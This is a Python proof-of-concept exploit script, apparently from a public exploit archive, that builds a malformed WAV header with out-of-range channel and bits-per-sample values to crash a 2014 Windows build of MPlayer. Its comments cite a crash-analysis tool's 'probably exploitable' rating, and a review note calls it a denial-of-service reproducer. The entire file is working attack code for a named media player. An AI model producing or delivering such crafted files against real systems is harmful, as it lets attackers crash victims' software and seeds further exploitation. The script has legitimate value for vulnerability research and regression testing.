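#!C:\Python27\python.exe
# Exploit Title: MPlayer - DoS
# Date: 2014-05-10
# Exploit Author: John Cobb - www.NoBytes.com
# Vendor Homepage: www.mplayerhq.hu
# Software Link: http://sourceforge.net/projects/mplayer-win32/files/MPlayer%20and%20MEncoder/r37182%2Bg09725c1/MPlayer-x86_64-r37182%2Bg09725c1.7z/download
# Version: [05/03/2014] (MPlayer-x86_64-r37182+g09725c1)
# Tested on: Win7 SP1 64bit
# CVE: None
#
# !exploitable
# Exploitability Classification: PROBABLY_EXPLOITABLE
# Recommended Bug Title: Probably Exploitable - Data Execution Prevention
#   Violation near NULL starting at Unknown Symbol @ 0x0000000000000008
#   called from Unknown Symbol @ 0x00000000067f2340 (Hash=0x48484848.0x53535353)
# User mode DEP access violations are probably exploitable if near NULL.
#
# NOTE(review): "PROBABLY_EXPLOITABLE" is !exploitable's heuristic verdict on
# the crash dump, not a demonstrated code-execution path. Treat this file as a
# denial-of-service / crash reproducer only, and open the generated .wav in an
# isolated, disposable VM.
"""Generate a malformed WAV file that crashes the listed MPlayer build.

The file is a bare RIFF/WAVE header followed by a 16-byte ``fmt `` chunk and
nothing else: the RIFF size field is left at zero and no ``data`` chunk is
written, so the crash is triggered while the format header itself is parsed.
The two trigger values are an out-of-range channel count (1537) and bits
per sample (65489); every other field is a plausible 8 kHz PCM description.

Written to run unchanged under Python 2.7 (the shebang above) and Python 3:
only ``bytes`` literals, ``struct`` and binary-mode I/O are used.
"""

import struct
import sys

# Field values from the original PoC, kept as named constants so the
# trigger values are visible at a glance rather than buried in hex strings.
WAVE_FORMAT_EXTENSIBLE = 0xFFFE   # wFormatTag in the original FMTPT1 bytes
SAMPLES_PER_SEC = 8000            # 0x1F40
AVG_BYTES_PER_SEC = 64000         # 0xFA00
BLOCK_ALIGN = 8
CRASH_CHANNELS = 1537             # 0x0601 - "The Crash"
CRASH_BITS_PER_SAMPLE = 65489     # 0xFFD1 - "The Crash"
DEFAULT_OUTPUT = "exploit.wav"


def build_payload(channels=CRASH_CHANNELS, bits_per_sample=CRASH_BITS_PER_SAMPLE):
    """Return the 36-byte malformed WAV header as ``bytes``.

    Args:
        channels: value for the fmt chunk's nChannels field (0..65535).
        bits_per_sample: value for the wBitsPerSample field (0..65535).

    Returns:
        ``bytes`` consisting of the RIFF header (size field zero), the
        ``WAVE`` tag and a 16-byte ``fmt `` chunk. With the default
        arguments the output is byte-for-byte identical to the original
        hand-assembled payload.

    Raises:
        struct.error: if either value does not fit in an unsigned 16-bit
            field.
    """
    # RIFF header: "RIFF", total size (deliberately 0, as in the PoC), "WAVE".
    riff_header = struct.pack("<4sI4s", b"RIFF", 0, b"WAVE")

    # fmt chunk: tag, chunk size 16, then the standard PCM WAVEFORMAT fields.
    # All multi-byte fields are little-endian per the RIFF specification.
    fmt_chunk = struct.pack(
        "<4sIHHIIHH",
        b"fmt ",
        16,
        WAVE_FORMAT_EXTENSIBLE,
        channels,
        SAMPLES_PER_SEC,
        AVG_BYTES_PER_SEC,
        BLOCK_ALIGN,
        bits_per_sample,
    )
    return riff_header + fmt_chunk


def write_payload(path=DEFAULT_OUTPUT, payload=None):
    """Write ``payload`` (default: :func:`build_payload`) to ``path``.

    The file is opened in binary mode: the original PoC used text mode,
    which on Windows would silently rewrite any 0x0A byte as CR LF and
    corrupt the header if the trigger values were ever changed.

    Returns:
        The number of bytes written.
    """
    if payload is None:
        payload = build_payload()
    with open(path, "wb") as out:
        out.write(payload)
    return len(payload)


def main(argv=None):
    """Command-line entry point: ``python exploit.py [output.wav]``."""
    args = sys.argv[1:] if argv is None else argv
    path = args[0] if args else DEFAULT_OUTPUT
    write_payload(path)


if __name__ == "__main__":
    main()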